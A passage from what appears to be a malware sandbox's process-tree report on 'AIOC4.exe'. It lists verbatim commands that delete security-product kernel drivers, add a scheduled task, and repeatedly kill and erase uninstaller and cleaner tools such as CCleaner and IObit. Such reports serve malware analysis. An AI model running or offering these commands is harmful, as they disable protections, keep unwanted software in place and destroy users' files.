"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_ev.sys*
6⤵
PID:4220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot.sys kisboot.sys.remove
6⤵
PID:3772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot.sys*
6⤵
PID:1192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot64.sys kisboot64.sys.remove
6⤵
PID:2236

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot64.sys*
6⤵
PID:4228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kiscore.sys kiscore.sys.remove
6⤵
PID:2100

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kiscore.sys*
6⤵
PID:3172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl.sys kisknl.sys.remove
6⤵
PID:1240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl.sys*
6⤵
PID:3548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl_del.sys kisknl_del.sys.remove
6⤵
PID:3460

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl_del.sys*
6⤵
PID:2224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl64_arm.sys kisknl64_arm.sys.remove
6⤵
PID:4952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl64_arm.sys*
6⤵
PID:2168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt.sys kisnetflt.sys.remove
6⤵
PID:1252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt.sys*
6⤵
PID:5024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt64_arm.sys kisnetflt64_arm.sys.remove
6⤵
PID:1140

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt64_arm.sys*
6⤵
PID:2572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm_ev.sys kisnetm_ev.sys.remove
6⤵
PID:3832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm_ev.sys*
6⤵
PID:4052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_arm.sys kisnetm64_arm.sys.remove
6⤵
PID:2052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_arm.sys*
6⤵
PID:1708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_ev.sys kisnetm64_ev.sys.remove
6⤵
PID:3724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_ev.sys*
6⤵
PID:4424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetmxp.sys kisnetmxp.sys.remove
6⤵
PID:5028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetmxp.sys*
6⤵
PID:3104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi.sys ksapi.sys.remove
6⤵
PID:1704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi.sys*
6⤵
PID:3964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64.sys ksapi64.sys.remove
6⤵
PID:3824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64.sys*
6⤵
PID:2428

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64_arm.sys ksapi64_arm.sys.remove
6⤵
PID:4444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64_arm.sys*
6⤵
PID:3500

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery.sys kusbquery.sys.remove
6⤵
PID:3040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery.sys*
6⤵
PID:5068

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery64.sys kusbquery64.sys.remove
6⤵
PID:5036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery64.sys*
6⤵
PID:2676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\tfossiksy.sys tfossiksy.sys.remove
6⤵
PID:396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\tfossiksy.sys*
6⤵
PID:4248

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\2345* 2345*.remove
6⤵
PID:1072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\2345*
6⤵
PID:4576

C:\Program Files\AIOC4\PrimaryScreen.exe
"PrimaryScreen.exe" ScaleX
6⤵
- Executes dropped EXE
PID:804

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C ver
6⤵
PID:1944

C:\Program Files\AIOC4\AIOC4.exe
"C:\Program Files\AIOC4\AIOC4.exe" /ClearAUTOUninstaller
6⤵
- Executes dropped EXE
- Sets file execution options in registry
- Checks computer location settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3544

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c ver
7⤵
PID:2372

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "JServer" /XML "C:\Program Files\AIOC4\AIOC_Cache\Tools\JServer.XML"
7⤵
- Creates scheduled task(s)
PID:3580

C:\ProgramData\Microsoft\s_a.exe
"C:\ProgramData\Microsoft\s_a.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /Q /A %TEMP%\*aioc_*
7⤵
PID:2092

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TASKKILL /F /IM AU_CN.exe
7⤵
PID:2076

C:\Windows\system32\taskkill.exe
TASKKILL /F /IM AU_CN.exe
8⤵
PID:4464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TASKKILL /F /IM "Easy remove - Autodesk系列软件卸载工具.exe"
7⤵
PID:3224

C:\Windows\system32\taskkill.exe
TASKKILL /F /IM "Easy remove - Autodesk系列软件卸载工具.exe"
8⤵
- Kills process with taskkill
PID:4576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\*Easy*remove*
7⤵
PID:1532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\mntemp
7⤵
PID:4776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\node.dll
7⤵
PID:4208

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\node
7⤵
PID:3988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\webconfig.ini
7⤵
PID:4656

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %SystemRoot%\System32\NSudo*.exe
7⤵
PID:1376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %SystemRoot%\SysWOW64\NSudo*.exe
7⤵
PID:1252

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:4248

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C RD /S /Q "C:\ProgramData\uninstall"
7⤵
PID:3772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C RD /S /Q "C:\ProgramData\TEMP"
7⤵
PID:5084

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\0.bat
7⤵
PID:1604

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4836

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:4144

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:3692

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:4304

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:3204

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:4952

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:5316

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:6076

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:1664

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:1400

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:4652

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:5760

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:4908

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:5640

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:3736

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:4760

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:6100

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:5876

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:1300

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:5316

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:5968

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:5260

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:6032

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:5576

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:5228

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:5236

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:5556

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:4060

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:5820

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:5628

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:5596

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:4592

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:3664

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:4404

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:3724

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:1248

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:3956

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:3852

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:2308

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:5140

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:4468

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:3820

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:6124

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:860

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:6140

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:5260

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:6032

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:5204

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:4132

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:5556

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:5712

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:5716

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:3148

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:6016

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:5152

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:2376

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2328

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:1404

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:5972

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:5276

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:5312

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:5328

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:4876

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:5400

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:3276

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:4800

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:1452

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:3112

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:5080

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:3832

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:6104

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:5984

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:5692

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:3460

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:5780

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:4728

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:5876

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:2296

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:1164

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:5964

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2168

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:3736

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:5516

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:3964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "%SystemRoot%\*AUTO*Uninstaller*"
7⤵
PID:376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "%SystemRoot%\System32\*AUTO*Uninstaller*"
7⤵
PID:1260

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C DIR /AD /B C:\Windows\*AUTO*Uninstaller*
7⤵
PID:3148

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "%SystemRoot%\SysWOW64\*AUTO*Uninstaller*"
7⤵
PID:4524

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C DIR /AD /B C:\Windows\System32\*AUTO*Uninstaller*
7⤵
PID:1364

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C DIR /AD /B C:\Windows\SysWOW64\*AUTO*Uninstaller*
7⤵
PID:4548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*AUTO*Uninstaller*"
7⤵
PID:3940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\msicuu2.*"
7⤵
PID:5004

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\msicuu.*"
7⤵
PID:3284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*Easy*remove*"
7⤵
PID:3824

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:4052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*CCleaner*"
7⤵
PID:756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*geek*"
7⤵
PID:2304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*cad*uninstall*"
7⤵
PID:1404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*cadallclear*"
7⤵
PID:3536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*iobit*uninstall*"
7⤵
PID:2200

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*Dism++*"
7⤵
PID:3484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*UninstallTool*"
7⤵
PID:2296

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*Total*Uninstal*"
7⤵
PID:3044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*AUTO*Uninstaller*"
7⤵
PID:4964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\msicuu2.*"
7⤵
PID:1248

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\msicuu.*"
7⤵
PID:3968

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*Easy*remove*"
7⤵
PID:2900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*CCleaner*"
7⤵
PID:2044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*geek*"
7⤵
PID:2984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*cad*uninstall*"
7⤵
PID:4460

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*cadallclear*"
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*iobit*uninstall*"
7⤵
PID:2476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*Dism++*"
7⤵
PID:3104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*Total*Uninstal*"
7⤵
PID:4840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*AUTO*Uninstaller*"
7⤵
PID:2100

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\msicuu2.*"
7⤵
PID:2224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\msicuu.*"
7⤵
PID:2072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*Easy*remove*"
7⤵
PID:4736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*CCleaner*"
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2328

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*geek*"
7⤵
PID:1716

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*cad*uninstall*"
7⤵
PID:4868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*cadallclear*"
7⤵
PID:5040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*iobit*uninstall*"
7⤵
PID:1556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*Dism++*"
7⤵
PID:3724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*Total*Uninstal*"
7⤵
PID:1576

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:3964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*AUTO*Uninstaller*"
7⤵
PID:4924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\msicuu2.*"
7⤵
PID:1056

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:5028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\msicuu.*"
7⤵
PID:4544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*Easy*remove*"
7⤵
PID:4196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*CCleaner*"
7⤵
PID:1124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*geek*"
7⤵
PID:3120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*cad*uninstall*"
7⤵
PID:4404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*cadallclear*"
7⤵
PID:4080

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*iobit*uninstall*"
7⤵
PID:924

